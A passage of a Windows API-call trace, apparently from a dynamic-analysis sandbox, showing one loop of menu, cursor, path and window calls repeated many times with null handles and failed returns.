hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.643] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.643] GetStockObject (i=6) returned 0x1b00018 [0100.643] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.643] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.643] PathFileExistsW (pszPath=0x0) returned 0 [0100.644] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.644] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.644] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.644] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.644] GetMenu (hWnd=0x0) returned 0x0 [0100.644] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.644] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.644] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.644] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.644] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.644] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.644] GetStockObject (i=6) returned 0x1b00018 [0100.644] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.644] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.644] PathFileExistsW (pszPath=0x0) returned 0 [0100.644] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.644] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.644] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.644] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.644] GetMenu (hWnd=0x0) returned 0x0 [0100.644] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3b5) returned -1 [0100.644] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.644] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.644] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.644] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.644] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.644] GetStockObject (i=6) returned 0x1b00018 [0100.644] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.644] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.644] PathFileExistsW (pszPath=0x0) returned 0 [0100.644] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.644] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.644] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.644] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.645] GetMenu (hWnd=0x0) returned 0x0 [0100.645] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.645] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.645] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.645] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.645] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.645] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.645] GetStockObject (i=6) returned 0x1b00018 [0100.645] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.645] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.645] PathFileExistsW (pszPath=0x0) returned 0 [0100.645] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.645] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.645] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.645] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.645] GetMenu (hWnd=0x0) returned 0x0 [0100.645] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.645] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.645] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.645] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.645] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.645] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.645] GetStockObject (i=6) returned 0x1b00018 [0100.645] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.645] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.645] PathFileExistsW (pszPath=0x0) returned 0 [0100.645] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.645] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.645] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.645] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.645] GetMenu (hWnd=0x0) returned 0x0 [0100.645] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.645] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.645] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.645] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.645] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.646] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.646] GetStockObject (i=6) returned 0x1b00018 [0100.646] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.646] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.646] PathFileExistsW (pszPath=0x0) returned 0 [0100.646] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.646] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.646] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.646] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.646] GetMenu (hWnd=0x0) returned 0x0 [0100.646] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.646] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.646] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.646] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.646] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.646] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.646] GetStockObject (i=6) returned 0x1b00018 [0100.646] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.646] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.646] PathFileExistsW (pszPath=0x0) returned 0 [0100.646] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.646] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.646] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.646] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.646] GetMenu (hWnd=0x0) returned 0x0 [0100.646] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x48f) returned -1 [0100.646] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.646] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.646] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.646] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.646] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.646] GetStockObject (i=6) returned 0x1b00018 [0100.646] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.646] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.646] PathFileExistsW (pszPath=0x0) returned 0 [0100.646] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.647] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.647] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.647] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.647] GetMenu (hWnd=0x0) returned 0x0 [0100.647] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.647] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.647] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.647] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.647] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.647] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.647] GetStockObject (i=6) returned 0x1b00018 [0100.647] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.647] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.647] PathFileExistsW (pszPath=0x0) returned 0 [0100.647] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.647] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.647] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.647] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.647] GetMenu (hWnd=0x0) returned 0x0 [0100.647] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.647] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.647] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.647] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.647] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.647] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.647] GetStockObject (i=6) returned 0x1b00018 [0100.647] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.647] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.647] PathFileExistsW (pszPath=0x0) returned 0 [0100.647] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.647] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.647] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.647] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.647] GetMenu (hWnd=0x0) returned 0x0 [0100.647] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.647] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.647] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.648] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.648] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.648] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.648] GetStockObject (i=6) returned 0x1b00018 [0100.648] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.648] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.648] PathFileExistsW (pszPath=0x0) returned 0 [0100.648] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.648] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.648] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.648] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.648] GetMenu (hWnd=0x0) returned 0x0 [0100.648] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x344) returned -1 [0100.648] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.648] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.648] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.648] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.648] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.648] GetStockObject (i=6) returned 0x1b00018 [0100.648] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.648] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.648] PathFileExistsW (pszPath=0x0) returned 0 [0100.648] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.648] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.648] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.648] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.648] GetMenu (hWnd=0x0) returned 0x0 [0100.648] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1a8) returned -1 [0100.648] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.648] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.648] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.648] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.648] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.648] GetStockObject (i=6) returned 0x1b00018 [0100.648] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.648] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.649] PathFileExistsW (pszPath=0x0) returned 0 [0100.649] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.649] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.649] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.649] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.649] GetMenu (hWnd=0x0) returned 0x0 [0100.649] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.649] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.649] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.649] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.649] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.649] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.649] GetStockObject (i=6) returned 0x1b00018 [0100.649] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.649] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.649] PathFileExistsW (pszPath=0x0) returned 0 [0100.649] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.649] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.649] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.649] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.649] GetMenu (hWnd=0x0) returned 0x0 [0100.649] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.649] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.649] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.649] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.649] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.649] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.649] GetStockObject (i=6) returned 0x1b00018 [0100.649] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.649] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.649] PathFileExistsW (pszPath=0x0) returned 0 [0100.649] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.649] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.649] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.649] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.649] GetMenu (hWnd=0x0) returned 0x0 [0100.649] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.650] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.650] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.650] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.650] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.650] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.650] GetStockObject (i=6) returned 0x1b00018 [0100.650] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.650] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.650] PathFileExistsW (pszPath=0x0) returned 0 [0100.650] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.650] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.650] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.650] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.650] GetMenu (hWnd=0x0) returned 0x0 [0100.650] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.650] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.650] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.650] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.650] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.650] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.650] GetStockObject (i=6) returned 0x1b00018 [0100.650] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.650] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.650] PathFileExistsW (pszPath=0x0) returned 0 [0100.650] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.650] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.650] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.650] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.650] GetMenu (hWnd=0x0) returned 0x0 [0100.650] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4ef) returned -1 [0100.650] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.650] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.650] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.650] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.650] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.650] GetStockObject (i=6) returned 0x1b00018 [0100.651] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.651] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.651] PathFileExistsW (pszPath=0x0) returned 0 [0100.651] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.651] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.651] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.651] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.651] GetMenu (hWnd=0x0) returned 0x0 [0100.651] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.651] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.651] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.651] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.651] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.651] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.651] GetStockObject (i=6) returned 0x1b00018 [0100.651] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.651] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.651] PathFileExistsW (pszPath=0x0) returned 0 [0100.651] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.651] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.651] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.651] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.651] GetMenu (hWnd=0x0) returned 0x0 [0100.651] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.651] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.651] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.651] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.651] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.651] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.651] GetStockObject (i=6) returned 0x1b00018 [0100.651] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.651] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.651] PathFileExistsW (pszPath=0x0) returned 0 [0100.651] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.651] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.651] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.651] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.652] GetMenu (hWnd=0x0) returned 0x0 [0100.652] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.652] 